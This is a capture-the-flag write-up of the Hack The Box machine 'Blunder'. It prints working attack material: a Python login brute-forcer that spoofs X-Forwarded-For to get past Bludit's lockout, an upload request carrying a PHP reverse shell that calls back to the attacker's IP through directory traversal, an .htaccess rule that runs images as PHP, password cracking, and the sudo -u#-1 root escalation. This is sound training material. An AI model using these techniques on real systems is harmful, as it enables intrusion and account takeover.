> For the complete documentation index, see [llms.txt](https://calvin-lai.gitbook.io/calvin-lai-security/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://calvin-lai.gitbook.io/calvin-lai-security/hack-the-box-writeup/linux-machine/blunder-10.10.10.191.md).

# Blunder 10.10.10.191

![Completed at 29 October 2020](/files/-MKiRiFbYYZVovdLcFgJ)

## **Background**

**Blunder** is a Linux machine from [HackTheBox](https://www.hackthebox.eu/home/machines/profile/255), which is a real-life similar box that required CVE exploit technique, for training your ethical hacking and penetration testing skills.

After basic enumeration, this Linux server is a web application develops using the blunder CMS running on port 80. Using the tool Drib, some hidden files are found which contain a possible user name "*fergus*", and a Bruteforce protected admin login page also identifies. 

After google, I find that the Bruteforce protection of this version blunder CMS  can be bypassed. Get the administrative privilege account.  I am trying to upload PHP reverse shell to the site via the provided image uploaded function, uploaded success but fail to get the access path.  Google again, there is a CVE exploit on the Bludit that related to the directory traversal. Follow the instruction, get the low privilege access. 

The system is enumerated, there is a newer version of Bludit CMS is found and a file-based user account database is identified. There is an SHA-1 hashed password of a user account hugo. Crack the password using an online tool and get this user account access.

Enumerate the system again with a tool - linpeas, the sudo version have PE vulnerability. Following the exploitDB instruction, get the root access finally. 

<130n@calvinlai.com>

**Target Machine**: 10.10.10.191

**Attacker Machine**: 10.10.14.16

## **Hacking Process Part 0 – Service Scanning** <a href="#hacking-process-part-0-service-scanning" id="hacking-process-part-0-service-scanning"></a>

### **Quick Pre-searching** <a href="#quick-pre-searching" id="quick-pre-searching"></a>

![nmap -p- -T5 --min-rate=1000 10.10.10.191 -oG fkclai.nmap](https://lh4.googleusercontent.com/Ov-wMHJcRP-8qlRpbhAZG454G9EQCOHE4ElKOKm3gawBGSl4BBYsgiuNkxGydBIQxsfBxvRVcjt2i8lOauDwtUBjigbs41qJdRyK75DGpKEOhxuO9n4WBhi5jxwhUefW_OJvLe5Y)

### **Details Analysis** <a href="#details-analysis" id="details-analysis"></a>

![nmap -p $(grep -Eo '\[0-9\]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.191 -o nmap-result.txt](https://lh4.googleusercontent.com/6XhSoo7kLoxb4GldxJSaQljDJvPrZCQWc7JWw6yyOdSYfOOsUobdMXvYMfgVOH9DtfTIiO_cK_q_ax5PfHyX8BSBfV-oM2aEW1SSIN7kXN45PIZBvCl6gVPzZq9LPjo7jQg0135b)

**Enumeration Strategy**

Only port 80 open, focus on the web application and check any CVE vulnerability.&#x20;

## **Hacking Process Part 1 – Enumeration**

![](https://lh3.googleusercontent.com/7GnLLBriR-O2qCCdDA8QEjejZvykVIROqB-umnjJTnvE16v_bnw8FrJ3w6O6CmJ2RY5x27orPwAwJLwZr2Acb1_MfUy4nQOu54ba5Up5IXwISfv7iZ0EAk0UH4uArPGZVzupVPHW)

### **1.1 Enumerating the website**

Using the following tools, a folder and two files are found, /admin/, /robots.txt, and /todo.txt

* gobuster dir -u <http://10.10.10.191> -w /usr/share/wordlists/dirb/common.txt -x txt,pdf,php
* dirb <http://10.10.10.191/> /usr/share/wordlists/dirb/common.txt -o dirb-191.result&#x20;
* gobuster dir -u '<http://10.10.10.191/>' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-191.result&#x20;
* python3 /root/Documents/ctf/tools/dirsearch/dirsearch.py -u <http://10.10.10.191/> -e jsp,txt -x 301,302,403,404 --simple-report=dirsearch-191.result

**/robots.txt**

![](/files/-MKp4fviHtRQocy8FkyO)

**/todo.txt**

![](https://lh6.googleusercontent.com/JUpZj16Ij5a-hga_c-_15v1vJA7IZIH3QxBbirFM-ZeS0B_pG43DzirDaVUbCvPOCeq3z0G38RpX7sPgA8wvMSxBgWO8gMviF4ShWVhxEAVxUazPH1h-41yOhhQWOeb3wWYkHLnx)

**/admin/**

![](https://lh3.googleusercontent.com/Imte9GWusZl_uzpuZKQGht98YJkmZvsfRk9CPYIP8mLKpy9eS4HJEivPpj2CRgxYCLqrLIkMedczgj7Tc8cX9OgMcIZzmZB3uX4JBabZCk-SnIbyQvNhJRi3E6uYqxJg2GoW6zBm)

The source code of the login portal shows that it builds by the Bludit CMS and version is 3.9.2 and /todo.txt hints of a user `fergus`.

![](/files/-MKofYP5rWaUDR0YY4G8)

### 1.2 Get the website login

Brute forcing is not a simple task as the site is implemented the CSRF token, and after 10 login attempts my IP address being blocked. Next steps, I am going to search for any vulnerable of this bludit version and this [blog ](https://rastating.github.io/bludit-brute-force-mitigation-bypass/)is found.

I am failure by using the rockyou.txt as the password list to gain the website login access, but, it is success using [cewl ](https://tools.kali.org/password-attacks/cewl)to gathering the wordlist from the site.

```python
#!/usr/bin/env python3
import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = []

pwd = open('password.txt','r')
for line in pwd:
	line=line.rstrip()
	wordlist.append(line)

# Add the correct password to the end of the list
wordlist.append('adminadmin')

for password in wordlist:
	session = requests.Session()
	login_page = session.get(login_url)
	csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
	print('[*] Trying: {p}'.format(p = password))
	headers = {
		'X-Forwarded-For': password,
		'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
		'Referer': login_url
	}

	data = {
		'tokenCSRF': csrf_token,
		'username': username,
		'password': password,
		'save': ''
  		}

	login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

	if 'location' in login_result.headers:
		if '/admin/dashboard' in login_result.headers['location']:
			print()
			print('SUCCESS: Password found!')
			print('Use {u}:{p} to login.'.format(u = username, p = password))
			print()
			break

```

```bash
root@kclai:~/Documents/ctf/htb/linux/17-HTB-Blunder/exploit# cewl 10.10.10.191 > password.txt

root@kclai:~/Documents/ctf/htb/linux/17-HTB-Blunder/exploit# python3 exploit.py 
[*] Trying: CeWL 5.4.6 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
[*] Trying: the
[*] Trying: Load
[*] Trying: Plugins
[*] Trying: and
.......
.....
....
...
[*] Trying: Letters
[*] Trying: probably
[*] Trying: best
[*] Trying: fictional
[*] Trying: character
[*] Trying: RolandDeschain

SUCCESS: Password found!
Use fergus:RolandDeschain to login.

```

## Hacking Process Part 2 - Initial low privilege access

Enumerated the system after got the login access, there is an image upload function. A PHP reverse shell file and ".htaccess" can be bypassed the client-side validation and uploaded to the server successfully. But the file access path cannot be found. &#x20;

![](https://lh5.googleusercontent.com/Zz27cUBl7RHD6LoTMnT5qBFyHNWFVIgjJQS5JBn2hw77TemBACsIjxC_FZpVnLlEiyRK6zOB711cPuJbclCkhD4sN72bI2bc7snXq_jcyXhvGWTxJcoiADzLrapZAeAaeL78duqR)

After searching on the exploit database, there is a CVE vulnerability on Bludit 3.9.2 that related to the directory traversal. The PoC scripts show that the UUID can be used to control the result access path.

![](https://lh6.googleusercontent.com/BZ10XjFQnSPuIVyovLRQUuS4drTkiJM5CpKbpod0M4nyWsRF4bvdHtx8Ib_awwOz4AbWfujJMkjFUv5A6mAhDDWcTh8nPzJ1kTK75b7ktZt7Zs3Z5igDOFAhHci6u_DMKQmWXPpZ)

### 2.1 Get the www account access

As the upload validation only applies on the client-side, thus, using the burp to change the upload parameters (value of filename), the PHP reverse shell and the`.htaccess`files are uploaded to the `/tmp/`folder. I can execute the reverse shell PHP by visiting the <http://10.10.10.191/bl-content/tmp/reverse.php>

```http
POST /admin/ajax/upload-images HTTP/1.1
Host: 10.10.10.191
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.191/admin/new-content
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------1577569979961725874602175024
Content-Length: 11616
Connection: close
Cookie: BLUDIT-KEY=ngp0psekevm7je3hnrlhjmkj57

-----------------------------1577569979961725874602175024
Content-Disposition: form-data; name="images[]"; filename="reverse.png"
Content-Type: image/png
.....
.....
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
.....
.....
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.16';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/bash -i';
....
...
..
-----------------------------1577569979961725874602175024
Content-Disposition: form-data; name="uuid"

../../tmp
-----------------------------1577569979961725874602175024
Content-Disposition: form-data; name="tokenCSRF"

60f8752883482353d1ad20bbff841b4aa9668c71
-----------------------------1577569979961725874602175024--
```

```http
#.htaccess file
RewriteEngine off
AddType application/x-httpd-php .png

```

Finally, the initial web server account privilege access is obtained.

![](https://lh6.googleusercontent.com/Xn4OQUc3QVHxriJOJGua7e0ApDF2lhdAILO2w1-KC0Z1i9tDhM92guyxIk6A9dtvhnjZPLGHSKw7QsZoEQKh0Vbr3ct0fWZm_sD-IlINkcAJNzLcQaFfUT8dn4jNynTNSTBtoB9q)

### 2.2 Get the user account access

The system file shows that this bludit CMS setup to use the file-based database, three hashed password are found at users.php of two bludit folders. According to the official website for [recovery the admin password file](https://raw.githubusercontent.com/bludit/password-recovery-tool/master/recovery.php), this hashed password is in SHA-1 format. Using the [online tool](https://md5decrypt.net/en/Sha1/) to decrypt the hashed password. The password for hugo account obtains which is **Password120**.

![](https://lh4.googleusercontent.com/Hb7n2c5yXTZjJqEeiPbtM279jBozeequgHOTK5mNJG3hZtSB-rRKvLhfEUS0RcymJYvQz52pVgixeBwbMOF_8ajNUzD-xMoIzsx__NXKP9J_0ifvunJ2SKyTHE-s3JyByXqxgrIX)

I find that Hugo reuse his password reuse on their system account. Let's spawn a PTY shell, as this will allow us to use the su command. The low privilege user account obtain.

```bash
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ python -c "import pty;pty.spawn('/bin/bash');"
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ su hugo
su hugo
Password: Password120
```

![](https://lh4.googleusercontent.com/smtJFmQkXrl05QdstS20vfV5A76NQp7BIPSnBMkhKmoVL2fkJaD3I-zSyH4e3cCy7HaBPipe1dxde-MkFfDrEP-GdEr1NtYBVIagZU2bRiUXQYvsilR0kin9yd58QYwuqRXiTx-1)

## Hacking Process Part 3 - Privilege Escalation&#x20;

Download the [linpeas.sh ](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)to study the environment search for possible paths to escalate privileges on Linux hosts. The result shows the sudo version of this system is one of the possible paths to escalate privilege.

![](https://lh3.googleusercontent.com/5eL7IxwXEE09bHA_0H8VeqveV40RUswlRqOsPkaXLeUN3eJPq11NM8YebL4Q5oqE5dqNAsE0Ih4tuixpYriWvUo5UfKFBJs5pdd-pts595wODQ6lkLqa0rAyRNjMHKqcfdIA9xb7)

![](https://lh5.googleusercontent.com/n0cUZqBoHAn6HtzipFPvQbMPfOIr_a1ouj8ONaMVxySpIPom31Dewr3rtn3kPAyz1-Dk4s9I29DFBIGFvmMqbOYQnhrrGgiSkktv5wCyi7_awum6-U4W0eZVFT0p9Od3bH6VDr4G)

Searching the exploit db again, there is a [CVS exploit ](https://www.exploit-db.com/exploits/47502)on this sudo version is identified. Following the instruction, the root privilege obtain.&#x20;

![](https://lh6.googleusercontent.com/Ef69nDfJe7Z7TYLQlbANPQISyJY9ZxOAjIZwPF0Y4kPdil2CkiAf6VZYhOi6GQPMVwgi0urBlcB6AFWy9OOPm0uGml_684kYxwDg4FZ2a32be4X0h9fydG-Cu13bh1ZuAnhq2w7W)

```bash
hugo@blunder:~$ 
hugo@blunder:~$ sudo -l
sudo -l
Password: Password120

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
hugo@blunder:~$ sudo --version
sudo --version
Sudo version 1.8.25p1
Sudoers policy plugin version 1.8.25p1
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.25p1
hugo@blunder:~$ 
hugo@blunder:/$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
Password: Password120

root@blunder:/
```

![](https://lh3.googleusercontent.com/2B8xs4Ms2o39mrWze6pGaftu8yHVCv81_ksrvhhiuSLXPQNc3kL1AS_3A5jHu_ZqJeokh_yE_B8pRynfgxT9BiZ0qUm0c3HR-B_movvF_knVzQKfaUwb6vpdFMI1FlyxhpB0yglW)

## **Recommendation**

Missing patches are very common in the real-life system, we need to keep the system patches are updated to avoid know attack.&#x20;

## **Reference Link**

[**https://rastating.github.io/bludit-brute-force-mitigation-bypass/**](https://rastating.github.io/bludit-brute-force-mitigation-bypass/)\
[**https://raw.githubusercontent.com/bludit/password-recovery-tool/master/recovery.php**](https://raw.githubusercontent.com/bludit/password-recovery-tool/master/recovery.php)\
[**https://md5decrypt.net/en/Sha1/**](https://md5decrypt.net/en/Sha1/)\
[**https://www.exploit-db.com/exploits/47502**](https://www.exploit-db.com/exploits/47502)


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://calvin-lai.gitbook.io/calvin-lai-security/hack-the-box-writeup/linux-machine/blunder-10.10.10.191.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.